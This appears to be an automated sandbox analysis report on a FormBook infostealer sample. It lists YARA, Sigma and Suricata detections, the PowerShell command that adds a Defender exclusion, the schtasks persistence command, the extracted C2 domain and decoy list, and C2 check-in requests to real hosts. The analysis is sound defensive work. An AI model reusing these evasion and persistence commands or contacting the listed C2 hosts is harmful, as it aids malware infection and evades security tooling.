Process Memory Space: KfYvtUBOq.exe PID: 3360	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: KfYvtUBOq.exe PID: 3360	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2431:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: explorer.exe PID: 4004	ironshell_php	Semi-Auto-generated - file ironshell.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x5d62c:$s2: ~ Shell I 0x15f363:$s2: ~ Shell I 0x21980a:$s2: ~ Shell I
Process Memory Space: RegSvcs.exe PID: 5224	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x69537:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: rundll32.exe PID: 3236	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x1051d8:$a1: 3C 30 50 4F 53 54 74 09 40 0x106a5d:$a1: 3C 30 50 4F 53 54 74 09 40 0x10c337:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: rundll32.exe PID: 5360	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xbde2a:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 39 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
13.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
13.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
13.2.RegSvcs.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bdd0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
13.2.RegSvcs.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
13.2.RegSvcs.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a59:$sqlite3step: 68 34 1C 7B E1 0x17b6c:$sqlite3step: 68 34 1C 7B E1 0x17a88:$sqlite3text: 68 38 2A 90 C5 0x17bad:$sqlite3text: 68 38 2A 90 C5 0x17a9b:$sqlite3blob: 68 53 D8 7F 8C 0x17bc3:$sqlite3blob: 68 53 D8 7F 8C
13.2.RegSvcs.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
13.2.RegSvcs.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
13.2.RegSvcs.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbd0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
13.2.RegSvcs.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b937:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c93a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
13.2.RegSvcs.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18859:$sqlite3step: 68 34 1C 7B E1 0x1896c:$sqlite3step: 68 34 1C 7B E1 0x18888:$sqlite3text: 68 38 2A 90 C5 0x189ad:$sqlite3text: 68 38 2A 90 C5 0x1889b:$sqlite3blob: 68 53 D8 7F 8C 0x189c3:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 5 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\KfYvtUBOq.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\KfYvtUBOq.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, ParentProcessId: 6316, ParentProcessName: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\KfYvtUBOq.exe", ProcessId: 2612, ProcessName: powershell.exe

Sigma detected: Rundll32 Execution Without CommandLine Parameters

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\rundll32.exe", CommandLine: "C:\Windows\SysWOW64\rundll32.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 4004, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\Windows\SysWOW64\rundll32.exe", ProcessId: 3236, ProcessName: rundll32.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KfYvtUBOq" /XML "C:\Users\user\AppData\Local\Temp\tmp9563.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KfYvtUBOq" /XML "C:\Users\user\AppData\Local\Temp\tmp9563.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe, ParentImage: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe, ParentProcessId: 3360, ParentProcessName: KfYvtUBOq.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KfYvtUBOq" /XML "C:\Users\user\AppData\Local\Temp\tmp9563.tmp", ProcessId: 3872, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KfYvtUBOq" /XML "C:\Users\user\AppData\Local\Temp\tmp89CA.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KfYvtUBOq" /XML "C:\Users\user\AppData\Local\Temp\tmp89CA.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, ParentProcessId: 6316, ParentProcessName: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KfYvtUBOq" /XML "C:\Users\user\AppData\Local\Temp\tmp89CA.tmp", ProcessId: 1708, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\KfYvtUBOq.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\KfYvtUBOq.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, ParentProcessId: 6316, ParentProcessName: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\KfYvtUBOq.exe", ProcessId: 2612, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KfYvtUBOq" /XML "C:\Users\user\AppData\Local\Temp\tmp89CA.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KfYvtUBOq" /XML "C:\Users\user\AppData\Local\Temp\tmp89CA.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, ParentProcessId: 6316, ParentProcessName: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KfYvtUBOq" /XML "C:\Users\user\AppData\Local\Temp\tmp89CA.tmp", ProcessId: 1708, ProcessName: schtasks.exe

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.6 - Destination IP: 3.33.130.190

Timestamp:	2024-07-26T12:46:10.799436+0200
SID:	2031453
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.6 - Destination IP: 103.224.182.210

Timestamp:	2024-07-26T12:47:32.905145+0200
SID:	2031453
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.6 - Destination IP: 167.172.226.170

Timestamp:	2024-07-26T12:44:50.531397+0200
SID:	2031453
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.6 - Destination IP: 194.41.37.230

Timestamp:	2024-07-26T12:47:12.529661+0200
SID:	2031453
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 20.12.23.50 - Destination IP: 192.168.2.6

Timestamp:	2024-07-26T12:45:11.821005+0200
SID:	2022930
Source Port:	443
Destination Port:	49717
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.6 - Destination IP: 172.67.134.182

Timestamp:	2024-07-26T12:45:30.130961+0200
SID:	2031453
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.6 - Destination IP: 3.64.163.50

Timestamp:	2024-07-26T12:49:03.282016+0200
SID:	2031453
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 20.12.23.50 - Destination IP: 192.168.2.6

Timestamp:	2024-07-26T12:45:49.076540+0200
SID:	2022930
Source Port:	443
Destination Port:	49724
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe

Avira: detection malicious, Label: HEUR/AGEN.1357443

Found malware configuration

Source: 00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.dunia188j.store/gy15/"], "decoy": ["yb40w.top", "286live.com", "poozonlife.com", "availableweedsonline.com", "22926839.com", "petlovepet.fun", "halbaexpress.com", "newswingbd.com", "discountdesh.com", "jwoalhbn.xyz", "dandevonald.com", "incrediblyxb.christmas", "ailia.pro", "ga3ki3.com", "99812.photos", "richiecom.net", "ummahskills.online", "peakleyva.store", "a1cbloodtest.com", "insurancebygarry.com", "onz-cg3.xyz", "erektiepil.com", "hs-steuerberater.info", "20allhen.online", "mariaslakedistrict.com", "losterrrcossmpm.com", "tmb6x.rest", "bagelsliders.com", "njoku.net", "tatoways.com", "jmwmanglobalsolutionscom.com", "midnightemporium.shop", "gunaihotels.com", "midsouthhealthcare.com", "rtptt80.site", "carmen-asa.com", "gypsyjudyscott.com", "djkleel.com", "sophhia.site", "tqqft8l5.xyz", "00050385.xyz", "oiupa.xyz", "purenutrixion.com", "worldinfopedia.com", "8886493.com", "1e0bfijiz43k6c8.skin", "bunkerlabsgolf.com", "twinportslocal.com", "ttyijlaw.com", "poiulkj.top", "yuejiazy888.com", "betbox2347.com", "gettingcraftywitro.com", "mantap303game.icu", "skillspartner.net", "cbla.info", "rs-alohafactorysaleuua.shop", "bt365434.com", "redrivercompany.store", "abc8win5.com", "46431.club", "vivehogar.net", "menloparkshop.com", "1776biz.live"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe

ReversingLabs: Detection: 27%

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	ReversingLabs: Detection: 27%
Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Virustotal: Detection: 24%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2187373051.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2215621019.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4570995499.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4570871101.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4569825171.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2198814093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Joe Sandbox ML: detected

Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: RegSvcs.pdb, source: explorer.exe, 00000009.00000002.4590979961.00000000108EF000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4572804432.000000000515F000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4570178116.0000000002E72000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000D.00000002.2203912314.0000000001210000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.2199275035.00000000048AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.2203034931.0000000004A5B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4571590933.0000000004C10000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4571590933.0000000004DAE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.2216235525.0000000004CBE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.2209210659.00000000047CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.2216235525.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.2212610111.000000000497A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rundll32.pdb source: RegSvcs.exe, 00000007.00000002.2210069743.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2203786383.0000000001150000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2203216556.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 0000000F.00000002.4569435978.0000000000720000.00000040.80000000.00040000.00000000.sdmp, rundll32.exe, 00000011.00000002.2215447708.0000000000720000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000D.00000002.2203912314.0000000001210000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 0000000F.00000003.2199275035.00000000048AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.2203034931.0000000004A5B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4571590933.0000000004C10000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4571590933.0000000004DAE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.2216235525.0000000004CBE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.2209210659.00000000047CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.2216235525.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.2212610111.000000000497A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rundll32.pdbGCTL source: RegSvcs.exe, 00000007.00000002.2210069743.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2203786383.0000000001150000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2203216556.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4569435978.0000000000720000.00000040.80000000.00040000.00000000.sdmp, rundll32.exe, 00000011.00000002.2215447708.0000000000720000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: dKJy.pdbSHA256 source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, KfYvtUBOq.exe.0.dr
Source:	Binary string: RegSvcs.pdb source: explorer.exe, 00000009.00000002.4590979961.00000000108EF000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4572804432.000000000515F000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4570178116.0000000002E72000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dKJy.pdb source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, KfYvtUBOq.exe.0.dr

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Code function: 4x nop then jmp 0730ED1Ch	0_2_0730E3D9
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Code function: 4x nop then jmp 0730E01Ch	8_2_0730D6D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then pop edi	13_2_0040E41E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then pop edi	13_2_0040E43D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then pop edi	15_2_02B5E43D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then pop edi	15_2_02B5E41E

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 157.53.227.1 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 172.67.134.182 80			Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.dunia188j.store/gy15/

Performs DNS queries to domains with low reputation

Source:	DNS query: www.tqqft8l5.xyz
Source:	DNS query: www.jwoalhbn.xyz

Source: global traffic	HTTP traffic detected: GET /gy15/?RzuTsp=Y/N4KrVAXY1kocpgzu8WnG77ol+AHv4xLUA59fG9L70w7yqxHWlTkc1yvlLlDHtztMKBj2yhyA==&hL08qP=ojn0sl HTTP/1.1Host: www.dandevonald.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /gy15/?RzuTsp=ojuzNIgvg1BwHmAcToIecm58HYsz0PWD/adWnxcLSOv/0CtFh7ct+QMG65Nx8hG2JCp7w1BwJA==&hL08qP=ojn0sl HTTP/1.1Host: www.carmen-asa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /gy15/?RzuTsp=XHNRiWOL6AKBRIWnLgJD49myVGc8KkvpE41aN949WbE5iIv/qrJ/+jvCIwl+PYhctV8eVI3XMQ==&hL08qP=ojn0sl HTTP/1.1Host: www.rs-alohafactorysaleuua.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 3.33.130.190 3.33.130.190

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: NETACTUATEUS NETACTUATEUS
Source: Joe Sandbox View	ASN Name: AMAZONEXPANSIONGB AMAZONEXPANSIONGB

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\explorer.exe

Code function: 9_2_0E396F82 getaddrinfo,setsockopt,recv,

9_2_0E396F82

Source: global traffic	HTTP traffic detected: GET /gy15/?RzuTsp=Y/N4KrVAXY1kocpgzu8WnG77ol+AHv4xLUA59fG9L70w7yqxHWlTkc1yvlLlDHtztMKBj2yhyA==&hL08qP=ojn0sl HTTP/1.1Host: www.dandevonald.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /gy15/?RzuTsp=ojuzNIgvg1BwHmAcToIecm58HYsz0PWD/adWnxcLSOv/0CtFh7ct+QMG65Nx8hG2JCp7w1BwJA==&hL08qP=ojn0sl HTTP/1.1Host: www.carmen-asa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /gy15/?RzuTsp=XHNRiWOL6AKBRIWnLgJD49myVGc8KkvpE41aN949WbE5iIv/qrJ/+jvCIwl+PYhctV8eVI3XMQ==&hL08qP=ojn0sl HTTP/1.1Host: www.rs-alohafactorysaleuua.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic	DNS traffic detected: DNS query: www.dandevonald.com
Source: global traffic	DNS traffic detected: DNS query: www.carmen-asa.com
Source: global traffic	DNS traffic detected: DNS query: www.rs-alohafactorysaleuua.shop
Source: global traffic	DNS traffic detected: DNS query: www.tqqft8l5.xyz
Source: global traffic	DNS traffic detected: DNS query: www.jwoalhbn.xyz
Source: global traffic	DNS traffic detected: DNS query: www.99812.photos
Source: global traffic	DNS traffic detected: DNS query: www.20allhen.online
Source: global traffic	DNS traffic detected: DNS query: www.ttyijlaw.com
Source: global traffic	DNS traffic detected: DNS query: www.incrediblyxb.christmas
Source: global traffic	DNS traffic detected: DNS query: www.dunia188j.store
Source: global traffic	DNS traffic detected: DNS query: www.midsouthhealthcare.com
Source: global traffic	DNS traffic detected: DNS query: www.286live.com

Source: explorer.exe, 00000009.00000000.2148011571.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4578457861.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2148011571.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4578457861.000000000978C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000009.00000000.2148011571.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4578457861.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2148011571.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4578457861.000000000978C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000009.00000000.2148011571.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4578457861.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2148011571.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4578457861.000000000978C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
